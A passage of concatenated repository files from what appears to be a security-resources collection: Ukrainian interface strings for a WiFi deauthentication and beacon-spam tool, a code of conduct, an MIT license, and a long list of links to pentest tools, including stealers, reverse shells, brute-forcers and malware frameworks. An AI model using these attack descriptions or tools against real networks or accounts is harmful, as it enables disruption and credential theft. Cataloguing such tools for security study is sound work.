"attack_info": "- Ви можете втратити з'єднання при запуску атаки! \n- Вам потрібно вибрати мету для атаки deauth. \n- Вам потрібен збережений SSID для атаки маяка і зонда. \n- Натисніть перезавантажити, щоб оновити швидкість передачі пакетів. \n",
"settings_info": "- Деякі налаштування потребують перезавантаження. \n- Натисніть «Зберегти», щоб переконатися, що ваші зміни застосовані. \n",
"info_disclaimer": "У разі непередбаченої помилки перезавантажте сайт і подивіться на послідовний монітор для подальшого налагодження.",
"start_stop": "СТАРТ / СТОП",
"start": "СТАРТ",
"stop": "СТОП",
"wifi_off": "WiFi Вимкнути",
"reboot": "Перезавантажити",
"reset": "Скидання",
"enable_random": "Включити режим Рендомний",
"disable_random": "Вимкнути режим Рендомний",
"random_desc": "Увімкніть випадковий режим для створення випадкового списку SSID в заданий інтервал.",
"deauth_desc": "Закриває підключення WiFi-пристроїв, відправляючи фрейми деаутентификации для доступу до точок та обраним клієнтських пристроїв. \nЦе можливо тільки тому, що багато пристрою не використовують стандарт 802.11 w-2009, який забезпечує захист від цієї атаки. \n- Виберіть тільки одну мету! Коли ви вибираєте кілька цілей, які запускаються на різних каналах і запускають атаку, вони швидко перемикаються між цими каналами, і у вас немає шансів повторно підключитися до веб-інтерфейсу. \n",
"beacon_desc": "Маяковые пакети використовуються для реклами точок доступу. Постійно відправляючи пакети маяковых радіостанцій, це буде виглядати так, як ніби ви створили нові WiFi-мережі. \nВи можете вказати мережеві імена під SSID.",
"probe_desc": "Запити зонда відправляються клієнтськими пристроями, щоб запитати, чи відома мережа поблизу. \nВикористовуйте цю атаку, щоб заплутати WiFi-трекери, запросивши мережі, які ви вказали в списку SSID. \nУ малоймовірно, що ви побачите який-небудь вплив цієї атаки на ваш домашню мережу.",
"setting_version": "Номер версії, Тобто V2.0. \nЦю настройку можна змінити лише у вихідному коді.",
"setting_ssid": "SSID точки доступу, що використовується для веб-інтерфейсу (якщо дозволено). \nДовжина повинна бути від 1 до 31 символу.",
"setting_password": "Пароль точки доступу, що використовується для веб-інтерфейсу (якщо включений). \nДовжина повинна бути від 8 до 31 символу.",
"setting_channel": "Стандартний WiFi-канал, який використовується при запуску.",
"setting_hidden": "Приховує точку доступу, яка використовується для веб-інтерфейсу (якщо включена).",
"setting_captivePortal": "Включає доступний портал для точки доступу (якщо включений).",
"setting_autosave": "Включає автоматичне збереження SSID, імен пристроїв і налаштувань.",
"setting_autosavetime": "Інтервал часу для автоматичного збереження в мілісекундах.",
"setting_display": "Включає інтерфейс відображення.",
"setting_displayTimeout": "Час в секундах, після якого дисплей вимикається, коли він неактивний. \nЩоб відключити таймаут відображення, встановіть його в 0.",
"setting_serial": "Включає послідовний інтерфейс. \nНе рекомендується відключати його!",
"setting_serialEcho": "Включає ехо для кожного вхідного повідомлення через послідовний порт.",
"setting_web": "Включає веб-інтерфейс.",
"setting_webSpiffs": "Включає SPIFFS для всіх веб-файлів.",
"setting_led": "Включає функцію (RGB) LED.",
"setting_maxch": "Максимальний канал для сканування. \nUS = 11, EU = 13, Японія = 14.",
"setting_macAP": "MAC-адреса, що використовується для режиму точки доступу. \nЗверніть увагу, що MAC-адресу замінює тільки внутрішній MAC-адресу, коли включений режим точки доступу.",
"setting_macSt": "MAC-адреса, що використовується для режиму станції. \nБудь ласка, зверніть увагу, що MAC-адресу замінить тільки внутрішній MAC-адресу, коли включений режим станції.",
"setting_chtime": "Час сканування одного каналу перед переходом до наступного в мілісекундах (тільки якщо включений перемикання каналів).",
"setting_minDeauths": "Мінімальна кількість кадрів деаутентификации при скануванні для зміни світлодіода в режим deauth.",
"setting_attacktimeout": "Через деякий час (у секундах) атака автоматично зупиниться. \nВстановіть її на 0, щоб вимкнути її.",
"setting_forcepackets": "Скільки спроб відправити пакет. \nВстановите це значення вище, якщо ви хочете досягти більш високої швидкості передачі пакетів у завантаженій області. \nПереконайтеся, що цей параметр може зробити пристрій більш повільним або більш нестійким. \nМаксимальне значення - 255!",
"setting_deauthspertarget": "Скільки кадрів деаутентификации і дизассемблирования відправляється для кожної цілі.",
"setting_deauthReason": "Код причини, що відправляється з кадрами deauth, щоб повідомити цільового пристрою, чому з'єднання буде закрито.",
"setting_beaconchannel": "Якщо увімкнено, то буде відправлено всі кадри по різних каналах при запуску атаки маяка.",
"setting_beaconInterval": "Якщо встановлено true, маяки будуть відправлятися кожну секунду. Якщо встановлено значення false, інтервал буде дорівнює 100 мкс. \nA більше тривалий інтервал означає більшу стабільність і менше спаму пакетів, але це може зайняти більше часу, поки клієнти не знайдуть ssids при скануванні.",
"setting_randomTX": "Дозволяє рандомизированную потужність передачі для відправки кадрів маяка і зонда запиту.",
"setting_probesPerSSID": "Скільки кадрів запиту запиту надсилається для кожного SSID.",
"setting_lang": "Мову за замовчуванням для веб-інтерфейсу. \nПереконайтеся, що мовний файл існує!"
} |
|
Markdown | h4cker/CONTRIBUTING.md | # Contributor Covenant Code of Conduct
## Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, gender identity and expression, level of experience,
education, socio-economic status, nationality, personal appearance, race,
religion, or sexual identity and orientation.
## Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported. All complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org |
h4cker/LICENSE | MIT License
Copyright (c) 2023 Omar Santos
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE. |
|
Markdown | h4cker/more_tools.md | # More Cool Tools
The following are a collection of recently-released pen test tools. I update this list every time that there is a new post and when I find a new one around the Internet. The rest of the repository has hundreds of additional cybersecurity and pen test tools.
----
- [GhostDelivery - This Tool Creates A Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence](http://feedproxy.google.com/~r/PentestTools/~3/oWV8asKvS20/ghostdelivery-this-tool-creates.html)
- [ReverseTCPShell - PowerShell ReverseTCP Shell, Client & Server](http://feedproxy.google.com/~r/PentestTools/~3/pWymKYDrZz8/reversetcpshell-powershell-reversetcp.html)
- [ripVT - Virus Total API Maltego Transform Set For Canari](http://feedproxy.google.com/~r/PentestTools/~3/n4rLmMXJVa4/ripvt-virus-total-api-maltego-transform.html)
- [Vulners Scanner for Android - Passive Vulnerability Scanning Based On Software Version Fingerprint](http://feedproxy.google.com/~r/PentestTools/~3/jjXLZCER0Bk/vulners-scanner-for-android-passive.html)
- [ANDRAX v3 - The First And Unique Penetration Testing Platform For Android Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/3jIpU7zeiJg/andrax-v3-first-and-unique-penetration.html)
- [PcapXray v2.5 - A Network Forensics Tool To Visualize A Packet Capture Offline As A Network Diagram](http://feedproxy.google.com/~r/PentestTools/~3/EbsP_Xce8HA/pcapxray-v25-network-forensics-tool-to.html)
- [Python-Iocextract - Advanced Indicator Of Compromise (IOC) Extractor](http://feedproxy.google.com/~r/PentestTools/~3/FJzGewoG5dE/python-iocextract-advanced-indicator-of.html)
- [Vthunting - A Tiny Script Used To Generate Report About VirusTotal Hunting And Send It By Email, Slack Or Telegram](http://feedproxy.google.com/~r/PentestTools/~3/oKh1run6pi8/vthunting-tiny-script-used-to-generate.html)
- [Facebash - Facebook Brute Forcer In Shellscript Using TOR](http://feedproxy.google.com/~r/PentestTools/~3/f3cso_9atWo/facebash-facebook-brute-forcer-in.html)
- [Finshir - A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust](http://feedproxy.google.com/~r/PentestTools/~3/Wj-iLgszhts/finshir-coroutines-driven-low-and-slow.html)
- [autoPwn - Automate Repetitive Tasks For Fuzzing](http://feedproxy.google.com/~r/PentestTools/~3/LtbIQEba06g/autopwn-automate-repetitive-tasks-for.html)
- [Metabigor - Command Line Search Engines Without Any API Key](http://feedproxy.google.com/~r/PentestTools/~3/bwTS0tOubeM/metabigor-command-line-search-engines.html)
- [Userrecon-Py - Find Usernames In Social Networks](http://feedproxy.google.com/~r/PentestTools/~3/XDi8ASQbqK0/userrecon-py-find-usernames-in-social.html)
- [Amass - In-depth DNS Enumeration And Network Mapping](http://feedproxy.google.com/~r/PentestTools/~3/CU7t9RWRUVE/amass-in-depth-dns-enumeration-and.html)
- [Wpbullet - A Static Code Analysis For WordPress (And PHP)](http://feedproxy.google.com/~r/PentestTools/~3/BNNWMh0ROZI/wpbullet-static-code-analysis-for.html)
- [PhoneSploit - Using Open Adb Ports We Can Exploit A Devive](http://feedproxy.google.com/~r/PentestTools/~3/tEZLuU4Lcu4/phonesploit-using-open-adb-ports-we-can.html)
- [Kubolt - Utility For Scanning Public Kubernetes Clusters](http://feedproxy.google.com/~r/PentestTools/~3/snT7GJXlPRw/kubolt-utility-for-scanning-public.html)
- [Brutality - A Fuzzer For Any GET Entries](http://feedproxy.google.com/~r/PentestTools/~3/gVy5j3AqjzQ/brutality-fuzzer-for-any-get-entries.html)
- [P4wnP1 A.L.O.A. - Framework Which Turns A Rapsberry Pi Zero W Into A Flexible, Low-Cost Platform For Pentesting, Red Teaming And Physical Engagements](http://feedproxy.google.com/~r/PentestTools/~3/igwQvhbsl94/p4wnp1-aloa-framework-which-turns.html)
- [Sniffglue - Secure Multithreaded Packet Sniffer](http://feedproxy.google.com/~r/PentestTools/~3/MRP1DzlWgw4/sniffglue-secure-multithreaded-packet.html)
- [H2Buster - A Threaded, Recursive, Web Directory Brute-Force Scanner Over HTTP/2](http://feedproxy.google.com/~r/PentestTools/~3/-lNZG_fmj9M/h2buster-threaded-recursive-web.html)
- [CMSeeK v1.1.2 - CMS Detection And Exploitation Suite - Scan WordPress, Joomla, Drupal And Over 170 Other CMSs](http://feedproxy.google.com/~r/PentestTools/~3/uWJhOXaPcsE/cmseek-v112-cms-detection-and.html)
- [SSHD-Poison - A Tool To Get Creds Of Pam Based SSHD Authentication](http://feedproxy.google.com/~r/PentestTools/~3/A-jI5JynwFg/sshd-poison-tool-to-get-creds-of-pam.html)
- [HiddenWall - Linux Kernel Module Generator For Custom Rules With Netfilter (Block Ports, Hidden Mode, Rootkit Functions, Etc)](http://feedproxy.google.com/~r/PentestTools/~3/0hUZUgb6bck/hiddenwall-linux-kernel-module.html)
- [IPFinder CLI - The Official Command Line Client For IPFinder](http://feedproxy.google.com/~r/PentestTools/~3/U-_QsxsfhhU/ipfinder-cli-official-command-line.html)
- [VulnX - CMS And Vulnerabilites Detector And An Intelligent Auto Shell Injector](http://feedproxy.google.com/~r/PentestTools/~3/ARM75rpuTUo/vulnx-cms-and-vulnerabilites-detector.html)
- [TeleShadow v3 - Telegram Desktop Session Stealer (Windows)](http://feedproxy.google.com/~r/PentestTools/~3/oqLotdLySeI/teleshadow-v3-telegram-desktop-session.html)
- [Crosslinked - LinkedIn Enumeration Tool To Extract Valid Employee Names From An Organization Through Search Engine Scraping](http://feedproxy.google.com/~r/PentestTools/~3/_QTluYAcJxg/crosslinked-linkedin-enumeration-tool.html)
- [Graffiti - A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing](http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html)
- [Kali Linux 2019.2 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/62Wl1MOvd94/kali-linux-20192-release-penetration.html)
- [Versionscan - A PHP Version Scanner For Reporting Possible Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/AB7R5aHma34/versionscan-php-version-scanner-for.html)
- [XSSCon - Simple XSS Scanner Tool](http://feedproxy.google.com/~r/PentestTools/~3/7yTza_ZfCho/xsscon-simple-xss-scanner-tool.html)
- [Hydra 9.0 - Fast and Flexible Network Login Hacker](http://feedproxy.google.com/~r/PentestTools/~3/r4DjFhzT69U/hydra-90-fast-and-flexible-network.html)
- [Flashsploit - Exploitation Framework For ATtiny85 Based HID Attacks](http://feedproxy.google.com/~r/PentestTools/~3/lPG04RLt5rk/flashsploit-exploitation-framework-for.html)
- [Scavenger - Crawler Searching For Credential Leaks On Different Paste Sites](http://feedproxy.google.com/~r/PentestTools/~3/TibOQ-WmQVE/scavenger-crawler-searching-for.html)
- [OSIF - Open Source Information Facebook](http://feedproxy.google.com/~r/PentestTools/~3/kYJPsFZc8UQ/osif-open-source-information-facebook.html)
- [Bandit - Tool Designed To Find Common Security Issues In Python Code](http://feedproxy.google.com/~r/PentestTools/~3/wb0Wk6QXXFo/bandit-tool-designed-to-find-common.html)
- [Brutemap - Tool That Automates Testing Accounts To The Site's Login Page](http://feedproxy.google.com/~r/PentestTools/~3/HEi_Ynm05Wg/brutemap-tool-that-automates-testing.html)
- [Acunetix Vulnerability Scanner Now With Network Security Scans](http://feedproxy.google.com/~r/PentestTools/~3/dHIr1QsVQYw/acunetix-vulnerability-scanner-now-with.html)
- [Project iKy - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/Z24DwjUEpe4/project-iky-tool-that-collects.html)
- [Miteru - An Experimental Phishing Kit Detection Tool](http://feedproxy.google.com/~r/PentestTools/~3/T974-FHaask/miteru-experimental-phishing-kit.html)
- [SecurityRAT - Tool For Handling Security Requirements In Development](http://feedproxy.google.com/~r/PentestTools/~3/oMEzMUP6-CI/securityrat-tool-for-handling-security.html)
- [JWT Tool - A Toolkit For Testing, Tweaking And Cracking JSON Web Tokens](http://feedproxy.google.com/~r/PentestTools/~3/ZlIcP20eZRs/jwt-tool-toolkit-for-testing-tweaking.html)
- [Trigmap - A Wrapper For Nmap To Automate The Pentest](http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html)
- [Machinae v1.4.8 - Security Intelligence Collector](http://feedproxy.google.com/~r/PentestTools/~3/M0K8gqllktU/machinae-v148-security-intelligence.html)
- [WAFW00F v1.0.0 - Detect All The Web Application Firewall!](http://feedproxy.google.com/~r/PentestTools/~3/MQijesVOTIE/wafw00f-v100-detect-all-web-application.html)
- [Horn3t - Powerful Visual Subdomain Enumeration At The Click Of A Mouse](http://feedproxy.google.com/~r/PentestTools/~3/d2tUUrP62WU/horn3t-powerful-visual-subdomain.html)
- [Pacbot - Platform For Continuous Compliance Monitoring, Compliance Reporting And Security Automation For The Cloud](http://feedproxy.google.com/~r/PentestTools/~3/Rlt5JK-83Dc/pacbot-platform-for-continuous.html)
- [Findomain - A Cross-Platform Tool That Use Certificate Transparency Logs To Find Subdomains](http://feedproxy.google.com/~r/PentestTools/~3/wXgn5VWk6SU/findomain-cross-platform-tool-that-use.html)
- [Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts](http://feedproxy.google.com/~r/PentestTools/~3/IoUOymJezTw/sn1per-v70-automated-pentest-framework.html)
- [PAnalizer - Pornography Analizer And Face Searching](http://feedproxy.google.com/~r/PentestTools/~3/DrTqYWvAK1Q/panalizer-pornography-analizer-and-face.html)
- [FinalRecon - OSINT Tool For All-In-One Web Reconnaissance](http://feedproxy.google.com/~r/PentestTools/~3/SUc3j_Jc96w/finalrecon-osint-tool-for-all-in-one.html)
- [iCULeak - Tool To Find And Extract Credentials From Phone Configuration Files Hosted On Cisco CUCM](http://feedproxy.google.com/~r/PentestTools/~3/1QY0SIyYtbU/iculeak-tool-to-find-and-extract.html)
- [DumpTheGit - Searches Through Public Repositories To Find Sensitive Information Uploaded To The Github Repositories](http://feedproxy.google.com/~r/PentestTools/~3/kTA1D58El0U/dumpthegit-searches-through-public.html)
- [Vulmap - Online Local Vulnerability Scanners Project](http://feedproxy.google.com/~r/PentestTools/~3/7lKQQIWQGJk/vulmap-online-local-vulnerability.html)
- [AutoSource - Automated Source Code Review Framework Integrated With SonarQube](http://feedproxy.google.com/~r/PentestTools/~3/alJwKx_iHdQ/autosource-automated-source-code-review.html)
- [Kerbrute - A Tool To Perform Kerberos Pre-Auth Bruteforcing](http://feedproxy.google.com/~r/PentestTools/~3/IAxyISi4bAc/kerbrute-tool-to-perform-kerberos-pre.html)
- [Hackuna - The First Mobile App to Track Hackers](http://feedproxy.google.com/~r/PentestTools/~3/DMmt1Y2sd_A/hackuna-first-mobile-app-to-track.html)
- [Joy - A Package For Capturing And Analyzing Network Flow Data And Intraflow Data, For Network Research, Forensics, And Security Monitoring](http://feedproxy.google.com/~r/PentestTools/~3/Hnc6J2MxuZg/joy-package-for-capturing-and-analyzing.html)
- [Kostebek - Reconnaissance Tool Which Uses Firms Trademark Information To Discover Their Domains](http://feedproxy.google.com/~r/PentestTools/~3/uTvabW9syZ4/kostebek-reconnaissance-tool-which-uses.html)
- [Termshark - A Terminal UI For Tshark, Inspired By Wireshark](http://feedproxy.google.com/~r/PentestTools/~3/IT3zoOGfD70/termshark-terminal-ui-for-tshark.html)
- [PeekABoo - Tool To Enable Remote Desktop On The Targeted Machine](http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html)
- [10Minutemail - Python Temporary Email](http://feedproxy.google.com/~r/PentestTools/~3/6P5wkV_3yTU/10minutemail-python-temporary-email.html)
- [BruteDum - Brute Force Attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC With Hydra, Medusa And Ncrack](http://feedproxy.google.com/~r/PentestTools/~3/3Z-_-kI5aD8/brutedum-brute-force-attacks-ssh-ftp.html)
- [Cynet Free IR Tool Offering Empowers Responders to Know and Act Against Active Attacks](http://feedproxy.google.com/~r/PentestTools/~3/4Q01gW4bYSs/cynet-free-ir-tool-offering-empowers.html)
- [CQTools - The New Ultimate Windows Hacking Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/jwnMIPJ7f80/cqtools-new-ultimate-windows-hacking.html)
- [ExtAnalysis - Browser Extension Analysis Framework](http://feedproxy.google.com/~r/PentestTools/~3/_R9KNS4iKCY/extanalysis-browser-extension-analysis.html)
- [QRGen - Simple Script For Generating Malformed QRCodes](http://feedproxy.google.com/~r/PentestTools/~3/l5Kg34GFbeY/qrgen-simple-script-for-generating.html)
- [ReconT - Reconnaisance / Footprinting / Information Disclosure](http://feedproxy.google.com/~r/PentestTools/~3/cODwkrYCciM/recont-reconnaisance-footprinting.html)
- [Bashter - Web Crawler, Scanner, And Analyzer Framework](http://feedproxy.google.com/~r/PentestTools/~3/SioxR4luedw/bashter-web-crawler-scanner-and.html)
- [Adidnsdump - Active Directory Integrated DNS Dumping By Any Authenticated User](http://feedproxy.google.com/~r/PentestTools/~3/8FXqJbJc7lY/adidnsdump-active-directory-integrated.html)
- [Twint - An Advanced Twitter Scraping And OSINT Tool](http://feedproxy.google.com/~r/PentestTools/~3/Z6GYaIPVXh8/twint-advanced-twitter-scraping-and.html)
- [HostHunter - A Recon Tool For Discovering Hostnames Using OSINT Techniques](http://feedproxy.google.com/~r/PentestTools/~3/QiCNKN5VS74/hosthunter-recon-tool-for-discovering.html)
- [Flerken - Obfuscated Command Detection Tool](http://feedproxy.google.com/~r/PentestTools/~3/XuqcFjTq6S8/flerken-obfuscated-command-detection.html)
- [ScanQLi - Scanner To Detect SQL Injection Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/wgueXGutErU/scanqli-scanner-to-detect-sql-injection.html)
- [OSINT-Search - Useful For Digital Forensics Investigations Or Initial Black-Box Pentest Footprinting](http://feedproxy.google.com/~r/PentestTools/~3/D1r1ulQ7KTw/osint-search-useful-for-digital.html)
- [Parrot Security 4.6 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind](http://feedproxy.google.com/~r/PentestTools/~3/s2FArN4t_3o/parrot-security-46-security-gnulinux.html)
- [Evil Clippy - A Cross-Platform Assistant For Creating Malicious MS Office Documents](http://feedproxy.google.com/~r/PentestTools/~3/LSMeO4LPR0I/evil-clippy-cross-platform-assistant.html)
- [ParamPamPam - Brute Force Discover GET And POST Parameters](http://feedproxy.google.com/~r/PentestTools/~3/Wthy0oeZHOE/parampampam-brute-force-discover-get.html)
- [Osmedeus - Fully Automated Offensive Security Tool For Reconnaissance And Vulnerability Scanning](http://feedproxy.google.com/~r/PentestTools/~3/62_7K6wE8Hk/osmedeus-fully-automated-offensive_27.html)
- [Okadminfinder3 - Admin Panel Finder / Admin Login Page Finder](http://feedproxy.google.com/~r/PentestTools/~3/JYs9BE78JWg/okadminfinder3-admin-panel-finder-admin.html)
- [Cutter - Free And Open-Source GUI For Radare2 Reverse Engineering Framework](http://feedproxy.google.com/~r/PentestTools/~3/tox-LUVg8Io/cutter-free-and-open-source-gui-for.html)
- [NAXSI - An Open-Source, High Performance, Low Rules Maintenance WAF For NGINX](http://feedproxy.google.com/~r/PentestTools/~3/A8ZGsbVEM_o/naxsi-open-source-high-performance-low.html)
- [Raptor WAF v0.6 - Web Application Firewall using DFA](http://feedproxy.google.com/~r/PentestTools/~3/BA5LLiXZBVI/raptor-waf-v06-web-application-firewall.html)
- [FTPBruter - A FTP Server Brute Forcing Tool](http://feedproxy.google.com/~r/PentestTools/~3/hudxodR8GrU/ftpbruter-ftp-server-brute-forcing-tool.html)
- [Freddy - Automatically Identify Deserialisation Issues In Java And .NET Applications By Using Active And Passive Scans](http://feedproxy.google.com/~r/PentestTools/~3/9_sH_VhkADw/freddy-automatically-identify.html)
- [Findomain - A Tool That Use Certificate Transparency Logs To Find Subdomains](http://feedproxy.google.com/~r/PentestTools/~3/nZr4C2pqs0Q/findomain-tool-that-use-certificate.html)
- [Anevicon - A High-Performant UDP-based Load Generator](http://feedproxy.google.com/~r/PentestTools/~3/5XmXet0TlPs/anevicon-high-performant-udp-based-load.html)
- [Reverie - Automated Pentest Tools Designed For Parrot Linux](http://feedproxy.google.com/~r/PentestTools/~3/I5j5E3B9o2w/reverie-automated-pentest-tools.html)
- [EasySploit - Metasploit Automation (EASIER And FASTER Than EVER)](http://feedproxy.google.com/~r/PentestTools/~3/fAldiqcnlVY/easysploit-metasploit-automation-easier.html)
- [PyWhatCMS - Unofficial WhatCMS API Package](http://feedproxy.google.com/~r/PentestTools/~3/MipV-mhuXs0/pywhatcms-unofficial-whatcms-api-package.html)
- [Kubebot - A Security Testing Slackbot Built With A Kubernetes Backend On The Google Cloud Platform](http://feedproxy.google.com/~r/PentestTools/~3/9kvKVdDoeDg/kubebot-security-testing-slackbot-built.html)
- [drAFL - AFL + DynamoRIO = Fuzzing Binaries With No Source Code On Linux](http://feedproxy.google.com/~r/PentestTools/~3/hOVJOVPf6mg/drafl-afl-dynamorio-fuzzing-binaries.html)
- [Ttyd - Share Your Terminal Over The Web](http://feedproxy.google.com/~r/PentestTools/~3/bMyoKJQqRUI/ttyd-share-your-terminal-over-web.html)
- [mongoBuster - Hunt Open MongoDB Instances](http://feedproxy.google.com/~r/PentestTools/~3/SZ1n92RVaTc/mongobuster-hunt-open-mongodb-instances.html)
- [Parameth - This Tool Can Be Used To Brute Discover GET And POST Parameters](http://feedproxy.google.com/~r/PentestTools/~3/E2J6ATzXZjw/parameth-this-tool-can-be-used-to-brute.html)
- [EfiGuard - Disable PatchGuard And DSE At Boot Time](http://feedproxy.google.com/~r/PentestTools/~3/Er2ka-d-TW4/efiguard-disable-patchguard-and-dse-at.html)
- [fireELF - Fileless Linux Malware Framework](http://feedproxy.google.com/~r/PentestTools/~3/nkiWxHsqM50/fireelf-fileless-linux-malware-framework.html)
- [FLASHMINGO - Automatic Analysis Of SWF Files Based On Some Heuristics](http://feedproxy.google.com/~r/PentestTools/~3/ACw-482_MOc/flashmingo-automatic-analysis-of-swf.html)
- [Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/30pzbSTJjXw/platypus-modern-multiple-reverse-shell.html)
- [SilkETW - Flexible C# Wrapper For ETW (Event Tracing for Windows)](http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html)
- [Instantbox - Get A Clean, Ready-To-Go Linux Box In Seconds](http://feedproxy.google.com/~r/PentestTools/~3/fZlkpiyYgzM/instantbox-get-clean-ready-to-go-linux.html)
- [Pepe - Collect Information About Email Addresses From Pastebin](http://feedproxy.google.com/~r/PentestTools/~3/UWHcybSkf3A/pepe-collect-information-about-email.html)
- [W12Scan - A Simple Asset Discovery Engine For Cybersecurity](http://feedproxy.google.com/~r/PentestTools/~3/8ngOdmcdmkU/w12scan-simple-asset-discovery-engine.html)
- [Instainsane - Multi-threaded Instagram Brute Forcer](http://feedproxy.google.com/~r/PentestTools/~3/n2J8ihzAvxI/instainsane-multi-threaded-instagram.html)
- [Zeebsploit - Web Scanner / Exploitation / Information Gathering](http://feedproxy.google.com/~r/PentestTools/~3/9xaMRbIv1Dk/zeebsploit-web-scanner-exploitation.html)
- [TeleKiller - A Tool Session Hijacking And Stealer Local Passcode Telegram Windows](http://feedproxy.google.com/~r/PentestTools/~3/8Mcn9CeolB8/telekiller-tool-session-hijacking-and.html)
- [pwnedOrNot v1.1.7 - OSINT Tool To Find Passwords For Compromised Email Addresses](http://feedproxy.google.com/~r/PentestTools/~3/zMsIKFBaGtY/pwnedornot-v117-osint-tool-to-find.html)
- [0D1N v2.6 - Web Security Tool To Make Fuzzing At HTTP/S](http://feedproxy.google.com/~r/PentestTools/~3/ioYkysg8i6k/0d1n-v26-web-security-tool-to-make.html)
- [CredsLeaker v3 - Tool to Display A Powershell Credentials Box](http://feedproxy.google.com/~r/PentestTools/~3/9y08bFtnHNg/credsleaker-v3-tool-to-display.html)
- [GodOfWar - Malicious Java WAR Builder With Built-In Payloads](http://feedproxy.google.com/~r/PentestTools/~3/48DUIB_ttEQ/godofwar-malicious-java-war-builder.html)
- [XSStrike v3.1.4 - Most Advanced XSS Detection Suite](http://feedproxy.google.com/~r/PentestTools/~3/_ChCQ9dGpko/xsstrike-v314-most-advanced-xss.html)
- [Chkdfront - Check Domain Fronting](http://feedproxy.google.com/~r/PentestTools/~3/Ob0V8Rj5l6I/chkdfront-check-domain-fronting.html)
- [QRLJacker v2.0 - QRLJacking Exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/juZIlVyrDiM/qrljacker-v20-qrljacking-exploitation.html)
- [Zeebsploit - Web Scanner / Exploitation / Information Gathering](http://feedproxy.google.com/~r/PentestTools/~3/RZKskKnsCFU/zeebsploit-web-scanner-exploitation_10.html)
- [Mysql-Magic - Dump Mysql Client Password From Memory](http://feedproxy.google.com/~r/PentestTools/~3/koY9c2YGnzc/mysql-magic-dump-mysql-client-password.html)
- [mXtract v1.2 - Memory Extractor & Analyzer](http://feedproxy.google.com/~r/PentestTools/~3/afNZNO7w4Xk/mxtract-v12-memory-extractor-analyzer.html)
- [DefectDojo v1.5.4 - Application Vulnerability Correlation And Security Orchestration Application](http://feedproxy.google.com/~r/PentestTools/~3/y_c8QTZckgk/defectdojo-v154-application.html)
- [Free Cynet Threat Assessment for Mid-sized and Large Organizations](http://feedproxy.google.com/~r/PentestTools/~3/nSnlxp2L5PU/free-cynet-threat-assessment-for-mid.html)
- [Beagle - An Incident Response And Digital Forensics Tool Which Transforms Security Logs And Data Into Graphs](http://feedproxy.google.com/~r/PentestTools/~3/cEy42c_u1ck/beagle-incident-response-and-digital.html)
- [ISF - Industrial Control System Exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html)
